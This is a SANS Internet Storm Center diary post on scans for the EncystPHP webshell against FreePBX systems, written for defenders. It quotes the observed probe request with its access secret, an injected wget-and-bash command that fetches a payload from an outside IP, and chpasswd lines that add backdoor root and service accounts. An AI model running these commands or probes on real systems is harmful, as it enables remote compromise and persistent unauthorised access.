Scans for EncystPHP Webshell, (Mon, Apr 13th)
\n \t
\n
<\/BR>
\n
\n \t
\n
<\/BR><\/p>\n
Last week, I wrote about attackers scanning for various webshells, hoping to find some that do not require authentication or others that use well-known credentials. But some attackers are paying attention\u00a0and are deploying webshells with more difficult-to-guess credentials. Today, I noticed some scans for what appears to be the “EncystPHP” web shell. Fortinet wrote about this webshell back in January. It appears to be a favorite among attackers compromising vulnerable FreePBX systems.<\/p>\n
The requests I observed look like:<\/p>\n
\nGET \/admin\/modules\/phones\/ajax.php?md5=cf710203400b8c466e6dfcafcf36a411
\nHost: [victim ip address]:8000
\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0
\nAccept-Encoding: gzip, deflate
\nAccept: *\/*
\nConnection: keep-alive<\/samp><\/p>\n<\/blockquote>\nThis URL matches what Fortinet reported<\/a> back in January.\u00a0<\/p>\n
The parameter name “md5” is a bit misleading. The webshell will just compare the string. The parameter is not necessarily the MD5 hash of a specific “password”; any string will work as long as it matches the\u00a0hard-coded string in the webshell. The string above has the correct length for an MD5 hash, but I wasn’t able to find it in common MD5 hash databases. It is very possible that only a few different values are used across different attack campaigns. Many attackers may just “copy\/paste” the code, including this access secret.<\/p>\n
Currently, these probes originate from %%ip:160.119.76.250%%, an IP address located in the Netherlands. The IP address hosts an unconfigured web server.\u00a0<\/p>\n
The same IP address is also probing for various FreePBX vulnerabilities, for example:<\/p>\n
\n\/restapps\/applications.php?linestate=$$LINESTATE$$&user=100
\nContext: ext-local<\/kbd><\/p>\nAction: Originate
\nChannel: Local\/DONTCALL@macro-dial
\nApplication: system
\ndata: wget http:\/\/45.95.147.178\/k.php -O \/tmp\/k;bash \/tmp\/<\/kbd>k<\/p>\n<\/blockquote>\nThis request also matches the scans reported by Fortinet, and it returns the EncystPHP webshell. This version is also adding the following backdoor accounts:<\/p>\n
\necho 'root:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>\/dev\/null || true
\necho 'hima:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>\/dev\/null || true
\necho 'asterisk:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>\/dev\/null || true
\necho 'sugarmaint:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>\/dev\/null || true
\necho 'spamfilter:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>\/dev\/null || true
\necho 'asteriskuser:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>\/dev\/null || true
\necho 'supports:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>\/dev\/null || true
\necho 'freepbxuser:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>\/dev\/null || true
\necho 'supermaint:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>\/dev\/null || true
\necho 'juba:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>\/dev\/null || true<\/kbd><\/p>\n<\/blockquote>\nIf you are using FreePBX, you may want to check for these accounts just to make sure.<\/p>\n
—
\nJohannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu<\/a>
\nTwitter<\/a>|<\/p>\n(c) SANS Internet Storm Center. https:\/\/isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.<\/p><\/div>\n
\t
\n
<\/BR><\/p>\n